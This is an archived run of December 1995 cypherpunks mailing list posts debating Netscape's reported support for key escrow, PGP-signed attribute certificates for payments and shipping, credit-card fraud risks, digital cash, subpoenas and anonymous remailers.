COULD ENTER AT THE SEARCH LINE:
        "SHOW ALL DEALERS IN BALTIMORE THAT SELL CHRYSLER MINI-VANS"
AND AN ACCURATE SEACH OF THE WEB WILL BE RETURNED.

AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE WEB,
THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.

OUR COMPANY HAS BEEN ASKED BY THE NEW YORK AUTO SHOW TO CREATE THE MOST
HIGHTECH VIRTUAL REALITY MOTION SIMULATOR THEATRE FOR THE 1996 NEW YORK AUTO
SHOW. DURING OUR RESEARCH, WE ENTERED "NEW YORK AUTO SHOW" IN OUR WEB CRAWLER
(AMERICA ON-LINE). YOU COULD NOT BELIEVE ALL OF THE GARBAGE THAT WAS RETURNED
FROM OUR SEARCH.

ADDITIONALLY FOR EXAMPLE, IF ON AMERICA ON-LINE YOU NEED TO SEND AN E-MAIL TO
DONALD TRUMP OR TO AOL'S STEVE CASE, WHEN YOU SEARCH THE AOL MEMBER DATABASE,
WHO IS THE REAL DONALD TRUMP OR THE REAL STEVE CASE.

IN SUMMARY, WHAT NEEDS TO BE DISCUSSED AT  IETF IN DALLAS NEXT WEEK IS A
STANDARD THAT PROTECTS TRADEMARKS AND SERVICE MARKS, AND ALSO A POLICING
AGENCY THAT WILL DETERMINE THAT DONALD TRUMP IS AT DONALD TRUMP@, CHRYSLER IS
AT CHRYSLERY@ BILL GATES IS AT BILL GATES@, ETC.

BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
PLACING ON THE WEB.


ED MEYER 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ravi Pandya <rpandya@netcom.com>
Date: Fri, 1 Dec 1995 04:01:16 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199511301927.LAA12863@netmanage.com>
MIME-Version: 1.0
Content-Type: text/plain


If you're looking for an alternative Web browser for Windows, we just made
ours available for free at www.netmanage.com. It's fast and reliable, and
supports HTML 3.0, inline video, software distribution, VRML (NT version),
Real Audio, TrueSpeech, etc.

Ravi

**** Home of Chameleon TCP/IP Applications for Windows and ****
**** ECCO Personal & Group Information Manager for Windows ****

Ravi Pandya
Director of ECCO Engineering
NetManage Inc
2340 130th Avenue NE
Bellevue, WA 98005
206 867 3722 voice
206 885 0127 fax
ravip@netmanage.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 14:12:32 +0800
To: cypherpunks@toad.com
Subject: Netscape, Corporations, and GAK Support
Message-ID: <ace330c90e0210045e96@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



The firestorm of criticisms of Netscape and Jim Clark over his apparent
support for mandated key escrow (GAK, "Government Access to Keys," Carl
Ellison) raises some issues:

1. To what extent is the government and its supporters of GAK applying
pressure to corporations and/or giving them private briefings on security
issues?

(Recall the infamous "If you knew what I knew, you'd support Clipper" sorts
of comments from people who'd apparently been glimpses of the Four Horsemen
riding in.)

2. What is the appropriate response for folks like us when it becomes
apparent that a corporation with a tremendous influence on future
directions in security and privacy (examples being both Microsoft and
Netscape) have apparently been jaw-boned in private on security issues?

(I tend to use "apparently" and "ostensibly" a lot, as you've probably
noticed. It's my way of signalling some uncertainty. The history of GAK has
indicated to me that discussions are happening in private with CEOs and
suchlike, else why or how could some of the public comments come out the
way they do? But I don't know this for a fact--a side effect of private
channels, ironically--so I can only call 'em as I "apparently" see 'em.)

Supporters of corporations, motivated by a range of reasons, often ask
critics to "hold off" on criticisms until firmer statements of policy are
made, or until actual products are introduced.

Alas, this is a bad strategy for us to follow. The very nature of the
behind-the-scenes manouvering, and the long lead times for products, means
that we must be alert for "early warning signals" of impending GAK and
other totalitarian measures.

I personally believe that the government supporters of mandated key escrow
and other restrictions on the use of encryption have looked at the
explosive growth of the Web in general and of Netscape in particular and
are *frantically* looking for ways to get a handle on the issues that
motivate them. As others have speculated, putting GAK into every Netscape
_server_ would have certain advantages, and I would be very surprised
indeed if NSA/NIST/Denning have not been thinking about this issue.

(Ray Cromwell says it can be skirted...I don't doubt this, just as
superencryption can skirt GAK in machine-to-machine e-mail. But this
doesn't mean that we should just ignore signs that GAK may be built into
Netscape, or other products.)

It's possible that Jim Clark--whose quotations I have not yet seen denied
by Netscape--is merely naive on matters of mandated key escrow. It's
possible that he hasn't given it much thought. It's also possible that he
sincerely is supportive of plans for Big Brother to have an "escrowed" copy
of our conversations, diaries, travel plans, etc.

I don't know, and I hope we soon hear more from Jim Clark on this issue.
But I will always think it appropriate to listen carefully for evidence
that a company plans to help build the Surveillance State, and to act in
response to such evidence.

The stakes are just too high to "wait for an actual product" before
speaking out.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 1 Dec 1995 01:01:49 +0800
To: jamesd@echeque.com
Subject: Attribute-testimony example (was Re: The future will be easy to use)
In-Reply-To: <199511301622.IAA08718@blob.best.net>
Message-ID: <9511301638.AA05094@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Wed, 29 Nov 1995 08:20:46 -0800
>From: "James A. Donald" <jamesd@echeque.com>
>
>From: Rich Salz <rsalz@osf.org>
>> > There is, of course, no way to interpret the semantics of this
>> > electronically.
>
>At 10:11 AM 11/30/95 EST, Carl Ellison wrote:
>> Of course not.  In the end, a human needs to make the decision based on
>> ASCII text.
>
>For those ascii texts that belong to a small and commonly used set,
>we can set our computers to automatically follow certain policies,
>and to bring to our attention "special case" texts that lie outside
>this set.

Exactly!

We haven't yet learned that small and commonly used set -- understandably,
since the field is so new.  I'd be willing to bet that association between
a key and a checking account would be on the list.  Beyond that, I don't
know.

Once an element of that set is identified, it can be assigned a codeword
(to make parsing easier).

For example, a general certificate might be:

- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: f149b8e7e1f71e60964fff361dae2460
Signed-Key-ID: 76c68cb46a8e3de1509acaf4170feb10
Meaning: I have met this person, introduced to me as James, who signed
	with that key and I found him to be about 25 years old, roughly
	5'11" and with dark hair.  Beyond that I don't remember much.

- -----BEGIN PGP SIGNATURE-----
[...]   signature with the signing key
- -----END PGP SIGNATURE-----



While the specialized one might be:

- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: bc2cb00144f223498fcc074eabb821d0
Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: checking-account: 116 94265, First Security Bank

- -----BEGIN PGP SIGNATURE-----
[...]   signature with First Security Bank's key
- -----END PGP SIGNATURE-----



This format has several advantages over ASN.1, of course, but I won't
belabor that point here.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML3ddFQXJENzYr45AQFxVQP/StUBo3fx4K97pv36af+2V40GUEGJircj
lNWZXeZAlsU/i+wdEzzRF3nWQ/H6wZjJgQDVNlox74CsMJp6T1YLDvbJ6/EAMG9M
kFIp6X2xkgnlZcH/4WsKqBDwTmF0kR0qoPWJY+7w5mtCrKNfsfN9JMaD4xdhueaM
U323z50t7ck=
=CxNl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patiwat Panurach <pati@ipied.tu.ac.th>
Date: Fri, 1 Dec 1995 00:30:56 +0800
To: cypherpunks@toad.com
Subject: VisaCash security.
In-Reply-To: <9511300318.AA02710@zorch.w3.org>
Message-ID: <Pine.SUN.3.91.951130113539.3024C-100000@ipied.tu.ac.th>
MIME-Version: 1.0
Content-Type: text/plain


	I have read that Visa intends to begin a digital cash system, 
using both discardable and recharable cards that would implement secure 
cash transations.  The system is now in use in Australia, and there are 
plans for use during the Olympic Games at Atlanta and a pilot project in 
Thailand.
	Does anybody know if this is truly "cash"?  Is is tracable, and 
what encryption does it use?

------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 1 Dec 1995 01:02:52 +0800
To: cypherpunks@toad.com
Subject: Re: e-cash gambling
In-Reply-To: <199511301536.QAA25670@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9511301102.A24799-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 30 Nov 1995, Anonymous wrote:

> I would like to see e-cash gambling on US Presidential elections/primaries
> [as is currently done in London & Moscow]. There was an interesting W$J
> article that pointed out how the odds in these gambling houses track the
> results of elections more accurately (from thousands of miles away) than
> Gallup & Roper ever have, (and without calling me at suppertime)<g>. The

Idea Futures. (This has already been mentioned in this thread)
There is an outfit calling itself Ideosphere that is planning a 
commercial version of an Idea Futures. It is certainly fairer than online 
roulette. You might want to try the game out yourself. Dr. Froomkin has a 
link to it on his homepage (I think). 

> It would accomplish the cypherpunk goals of setting important information
> free through use of our technology, it would encourage gamblers to learn
> about strong crypto, and it would use crypto for something besides child
> porn or drugs, which will be good PR for us. There will, of course, be

Incidentally there are a lot of crypto related claims being played (which
is natural considering the number of cpunks in the game).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 1 Dec 1995 04:28:04 +0800
To: edge@got.net (Jay Campbell)
Subject: Re: "Got a subpoena?"
In-Reply-To: <199511302056.MAA07241@you.got.net>
Message-ID: <199511301946.LAA12448@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> What about a court order to (a) start comprehensive logging, and (b) not
> tell anyone under penalty of ______ .

	Aren't court orders part of the public record? I don't quite
know how this would work. I don't think they can keep me from telling
people that I've started comprehensive logging, or at least keep it
from being founnd out. (Legally, that is. I'm sure they could always
use an approach like threatening to audit me every year, threatening
my family, etc.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Fri, 1 Dec 1995 02:55:30 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: cypherpunks at ietf
Message-ID: <199511301759.LAA18735@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


[...]
>THE WWW MUST BE CONSUMER FRIENDLY IF IT IS TO SURVIVE.
>
>THE AVERAGE CONSUMER THRU A PC, OR A "DEDICATED WEB TERMINAL ON TOP OF THEIR
>TV SET", MUST BE ABLE TO USE THE WEB IN THE FUTURE TO:
>
>          1. SEARCH FOR CONSUMER GOODS; ORDER CONSUMER GOODS.
>          2. USE THE WEB FOR TELEPHONE COMMUNICATIONS AND E-MAIL
>          3. DOWNLOAD TIME SHIFT AUDIO & VIDEO
>          4. DOWLOAD MOVIES, SOFTWARE, AND P.P.V. EVENTS
>          5. HOOK ON-LINE TO VIDEO & AUDIO 
6. View text in lower case.  :>
[...]

                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Fri, 1 Dec 1995 01:46:35 +0800
To: "'cypherpunks@toad.com>
Subject: RE: "Proprietary" internetworking protocols (was RE: The future will be easy to use )
Message-ID: <01BABF1F.0246DD80@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry wrote:
>Pete Loshin writes:
>> I was simply observing that Perry's comment:
>> 
>> "...an internetworking protocol [e.g. SKIP] used by only 
>> one vendor gets nowhere."
>> 
>> is not necessarily true, and pointed to SSL and NFS as 
>> counter-examples.
>
>I disagree.
>
>First of all, NFS was not competing with other widely available
>standards.

Neither was SSL, for that matter.  But it seems like every vendor
who's written an S-HTTP browser/server is adding SSL for version 1.1.

>Second of all, other vendors are committed to developing the other
>standard.
>
>What good will it be to run SKIP when your Cisco router wants to talk
>to you with something else?

None, of course, just as rsh doesn't help me connect to a telnet 
server. My comment wasn't on the wisdom of SKIP, but rather on 
the specific statement Perry made about single vendors being able 
to drive certain protocols on their own (e.g., SSL and others).

More interesting from the historical view (but lacking in crypto 
significance so I'll refrain from further posting on the topic) 
is the question of what other protocols have been put forth by 
single vendors and gained major market share.

-pl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 1 Dec 1995 02:23:17 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: The future will be easy to use
In-Reply-To: <01HY8GNOCLCS8WYXCN@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.91.951130123239.3869A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, E. ALLEN SMITH wrote:

> However, if you have optional linking of ID and name, shippers will only 
> ship to keys with such attributes. Because just ID and address, it could 
> be a "hit and run" type attack shipped to a safe maildrop.
> ---------------------------------
> 	If the transaction is via a Credit Card, it's the card issuer's
> liability (and responsibility to determine creditworthiness), unless I'm badly
> mistaken. If it's bank-issued ecash, then it's up to the bank to disgorge
> physical dollars when ecash is presented to them. What's the risk in either
> case?

Credit card fraud -- ie I've snarfed someone's card number and they 
haven't figured it out yet.

Cardholder's liability is $50 (I think).  Depending on the situation (if 
it's a card-is-physically-present transaction or a not-present) the 
liability falls to either the bank or the merchant.

A "proof of address" is a darn good way to reduce (not prevent, reduce) 
that sort of fraud.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 1 Dec 1995 02:38:46 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: The future will be easy to use
In-Reply-To: <199511300704.XAA01742@blob.best.net>
Message-ID: <Pine.SUN.3.91.951130123535.3869B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, James A. Donald wrote:

> >Not if you're encrypting a Credit Card transaction to ship physical 
> >goods.  In that case, I'm going to certainly want to link a key ID to a 
> >physical body (or at least address) if I'm the seller, so as to limit 
> >liability as best I can.
> 
> Not at all:  All you need to do is be able to prove you shipped 
> to the address requested:  You do not have to know what the 
> relationship is between the address requested and identity 
> paying you to ship.

That's if you're accusing the merchant of fraud. I'm positing someone's 
using a stolen credit card number.  (Yes, these will still exist for at 
least a while after e-cash becomes commonplace).  If I'm a merchant, I'm 
going to really want (if I know it's possible) to ship only to what's 
been "the address on the card" (or, in reality, in the database under the 
card's number) so that it's harder (not impossible, harder) for people to 
defraud me.

> > However, if you have optional linking of ID and name, shippers will only 
> > ship to keys with such attributes. Because just ID and address, it could 
> > be a "hit and run" type attack shipped to a safe maildrop.
> 
> This argument makes no sense at all:  I am going to attack my
> enemies by paying people to send books, computers, and stuff
> to them?

No; you're going to steal from your enemies by having them ship things to 
you without payment.

Note that in an ecash economy, this isn't a problem.  The original post 
was about the transition between the current economy and a "cypherpunks" 
economy, during which I suggested that encryption would be used to 
protect credit card numbers (and be a "proof of identity" -- which I was 
claiming wouldn't work without ecash (proof of non-fraud payment))

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Fri, 1 Dec 1995 05:50:28 +0800
To: cypherpunks@toad.com
Subject: Getting a copy of the Jim Clark speech
Message-ID: <199511302041.MAA19507@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I called Netscape public relations. Here's what I found out:

1. Netscape PR does not keep transcripts, etc., of Jim Clark's
speeches.

2. You can order a tape of the speech from Conference Copy for
$12. Their phone number is +1 (717) 775 0580. Be advised, though, that
it will take three weeks.

If we are lucky, an amateur recording technician (trained by the
Grateful Dead, perhaps?) will come out of the woodwork before
then. Failing that, maybe a Fair Witness was there and is willing to
speak.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 1 Dec 1995 02:49:07 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <30BD716E.5F69@netscape.com>
Message-ID: <199511301752.MAA06161@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
> sameer wrote:
> > 
> > http://www.cnet.com/Central/News/govt.html
> > 
> >         Bad. Very Bad. And I was almost starting to like Netscape.
> 
>   Please don't give up on us yet.  All press accounts I've read so far
> have lots of stuff attributed to Jim, but very little of it is actual
> quotes.

Jeff, I'll be blunt.

I'm never going to use Netscape again if it turns out to be true. Sure
Mosaic bites, but who cares -- with enough work we can make it or
something else compete with your product if need be, and I bet that
you guys can't keep up with five hundred angry hackers.

I'll also happily run a campaign to convince everyone else on the
internet that you guys are helping to violate their privacy, because
you would be. Tell Jim Clark that if he goes through with it he has
something far worse to lose than his friends in the government -- the
billion he just got his hands on. Tell him that if he is being
misquoted he'd better make sure that retractions get printed and fast.

If you don't want "Netscape Inside" to be treated as a warning label,
you guys will reject escrow as any other ethical company would -- or
else.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 1 Dec 1995 06:03:22 +0800
To: cypherpunks@toad.com
Subject: Re: List of reliable remailers
In-Reply-To: <199511301739.JAA13160@jobe.shell.portal.com>
Message-ID: <199511302053.MAA27611@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Apologies for following up on my own post, but I did some digging and
found out what I needed to know.

> > Groups of remailers sharing a machine or operator:
> > (robo syrinx c2)
> > (flame hacktic replay)
> > (alumni portal)
> 
> Anything more specific on the above info? 

It turns out that this information is only intended for automatic
chain selection, not as a capsule history of the remailers. But see
below.

>   robo, syrinx, c2 all running on c2.org
>   alumni, portal run by Hal Finney
>   hacktic, replay run on xs4all / by Alex de Joode?
> 
> ok so far, but flame is xs4all/de Joode as well?

In fact, yes, at least until Tomaz gets good enough Net access in
Slovenia to support a remailer.

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Fri, 1 Dec 1995 04:16:42 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: "Got a subpoena?"
Message-ID: <199511302056.MAA07241@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>> "finessing" laws will become more important.  In short, they WILL have
>> a subpoena--then what?
>
>	Then they'll find out that I don't have any information that
>could help them, anyway.

What about a court order to (a) start comprehensive logging, and (b) not
tell anyone under penalty of ______ .
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 1 Dec 1995 02:54:32 +0800
To: Jay Holovacs <holovacs@styx.ios.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.3.89.9511300825.A27268-0100000@styx.ios.com>
Message-ID: <199511301758.MAA06181@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jay Holovacs writes:
> On Thu, 30 Nov 1995, Timothy C. May wrote:
> 
> > 
> > Can Netscape continue to prosper? This latest issue won't kill it,
> 
> I suspect this will unfortunately help. Stockholders are interested in 
> profits, not principles.

Netscape is currently trading somewhere like 7000 times earnings. What
profits are you talking about, precisely?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 1 Dec 1995 03:00:33 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <9511301801.AA19366@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Absent such clarification, we must assume he considers the
> press reports of what he said to be reasonably accurate.

Speaking for myself, I wouldn't feel comfortable assuming that Clark's
priorities vis-a-vis correcting a handful of misquotes were as high as
I might want them to be.

So I wouldn't take this position (fun and full of righteous wrath though
it may be).  Instead I'd be optimistic and say "he hasn't gotten around
to it yet."  Just as I figure Elvis will eventually tell all those tabloids
that he and JFK were playing cards with Hoffa in Bimini all these many years.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vinnie@webstuff.apple.com (Vinnie Moscaritolo)
Date: Fri, 1 Dec 1995 06:26:24 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <v02110100ace3a9062ab4@[17.203.21.75]>
MIME-Version: 1.0
Content-Type: text/plain


GAK or is it Gack!!!

You know, one possible solution lies in the direction of Apple's CyberDog.
It is based on OpenDoc and should be portable to windoze, I hate to say Rah
told you so but...

Even with all the ITAR silliness, even if on the contigincy that Apple
can't provide a SSL or whatever in thier HTML part, YOU can always write
your own HTML part, (its just not that complicated) in the Cyberdog
environment and override the Apple CyberDog HTML part.

This looks like a great opertunity for some Cypherpunks to write code, and
code that people DO care about.. a CypherPunk CyberDog part to replace the
Apple HTML viewer with one that has hooks for an encryption API (GSSAPI?)


(lawyer types beware: This is definitely my opinion and you and I
both know Apple is old enough to speak for itself.)

-------------
Vinnie Moscaritolo
Apple DTS Sniper
"One Shot..One Kill"

http://webstuff.apple.com/~vinnie/

Fingerprint =  4F A3 29 81 50 E4 04 F2  78 25 01 87 6E A2 14 6A
--------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 1 Dec 1995 03:23:50 +0800
To: jlasser@rwd.goucher.edu
Subject: Re: The future will be easy to use
In-Reply-To: <Pine.SUN.3.91.951130123535.3869B-100000@rwd.goucher.edu>
Message-ID: <9511301819.AA11933@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 30 Nov 1995 12:39:50 -0500 (EST)
>From: Jon Lasser <jlasser@rwd.goucher.edu>

>  I'm positing someone's 
>using a stolen credit card number. [...] If I'm a merchant, I'm 
>going to really want (if I know it's possible) to ship only to what's 
>been "the address on the card" (or, in reality, in the database under the 
>card's number) so that it's harder (not impossible, harder) for people to 
>defraud me.

I'm not sure that's the reason, but there are merchants who insist on
shipping to the card's billing address.  This happens to me when I'm using
a credit card by phone, so the merchant has no signature on file.  For lack
of that proof that I'm me (as opposed to some inmate in a local prison
(actual case I heard about)), if they ship goods to the same address that
writes the actual check for the goods, there's added safety.

For a world with my non-certificates, this is achieved by a pair of
attribute statements:


- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: bc2cb00144f223498fcc074eabb821d0
Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: checking-account: 116 94265, First Security Bank

- -----BEGIN PGP SIGNATURE-----
[...]   signature with First Security Bank's key (bc2cb0...)
- -----END PGP SIGNATURE-----



- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: I receive packages (especially UPS and FedEx) at:
	Carl Ellison
	c/o Trusted Information Systems
	3060 Washington Road
	Glenwood MD 21738
	(301) 854-6889

- -----BEGIN PGP SIGNATURE-----
[...]   signature with my key (e05c60...)
- -----END PGP SIGNATURE-----


The first gives the necessary hook for the merchant to establish that key
e05c6... has money to spend, if the merchant feels the need to check.  The
second establishes a shipping address for that key.

Note that the word "I" in the second attribute statement means "the person
who knows how to make the attached signature with key (e05c60...)"  rather
than "Carl Ellison" (although, in this case, they're the same).

The shipping address could be anonymous:

- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: I receive USPS packages at:
	P.O. Box 360
	Glenwood MD 21738

- -----BEGIN PGP SIGNATURE-----
[...]   signature with my key (e05c60...)
- -----END PGP SIGNATURE-----



 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML31ZFQXJENzYr45AQHk1QQAplkBXXZ+tSiBA2B/0FbJtFkYabNJcC7T
lkDEG/jZVANhonX5KKRgwKwzg1cfMCAlbbe0s+3HLTMg5yj9Fw4UD/U0mgZ31HGo
16iqbOqoVpknI5qSHVH/p2QMKHb3N1wKOEH3VJc21mkO+5W77p0mXywvW5zJrRHR
qllQdZ3Xde0=
=UU9f
-----END PGP SIGNATURE-----

BTW -- I don't have a PO Box at Glenwood.  (cme)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 1 Dec 1995 06:31:23 +0800
To: cypherpunks@toad.com
Subject: Re: Getting a copy of the Jim Clark speech
In-Reply-To: <199511302041.MAA19507@infinity.c2.org>
Message-ID: <199511302124.NAA26868@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Raph Levien <raph@c2.org> writes:
> I called Netscape public relations. Here's what I found out:

> 1. Netscape PR does not keep transcripts, etc., of Jim Clark's speeches.
> 2. You can order a tape of the speech from Conference Copy for...

Good initiative, but we needn't wait for 6 weeks to get a copy of it.
All that needs to happen is for Jim Clark to explain what he meant, if
it's different from what was reported.  No need for all the to-ing and
fro-ing.

Perhaps what he meant was simply reiterating the announcement of October
when they said they'd support the TESSERA crypto API.  If it's worse than
this, he should explain what's going on.  If not, October was the time to
get excited rather than now.

Waiting with bated breath...

	Jim Gillogly
	Highday, 10 Foreyule S.R. 1995, 21:24




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 04:45:27 +0800
To: Ravi Pandya <cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <ace34e4b0f0210044da9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:26 PM 11/30/95, Ravi Pandya wrote:
>If you're looking for an alternative Web browser for Windows, we just made
>ours available for free at www.netmanage.com. It's fast and reliable, and
>supports HTML 3.0, inline video, software distribution, VRML (NT version),
>Real Audio, TrueSpeech, etc.

This shows the price Netscape could pay for taking a pro-surveillance,
anti-privacy stance.

Various alternatives to Netscape exist (even on the Mac), despite attempts
to make "Netscape-enhanced-encoding" (or whatever it's called) the
standard. I expect alternative browsers will catch up fairly quickly.

(As an aside, and based on my past experiences at Intel during its
rapid-growth phase, it may be tough for Netscape to keep people motivated
and focused on development, what with all the "distractions" of a stock
price of $140 when it was expected to go public at $14. CNBC reported
yesterday that several _secretaries_ at Netscape have cashed in $600K stock
options....I can imagine a lot of folks are eager to leave to enjoy their
new wealth, but will stick around for the future stock options. This
becomes a real drag on productivity, based on my experiences and those of
my friends at various other start up companies.)

I also expect that this pro-surveillance, anti-privacy "stumble" by Jim
Clark will either be quickly "clarified" (but perhaps nothing really
changed), or Netscape will suffer a black eye in public relations, with
many "Cypherpunk"-type people adopting a "Just Say No to Netscape!" stance.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 1 Dec 1995 03:27:38 +0800
To: cme@TIS.COM
Subject: Re: Attribute-testimony example (was Re: The future will be easy touse)
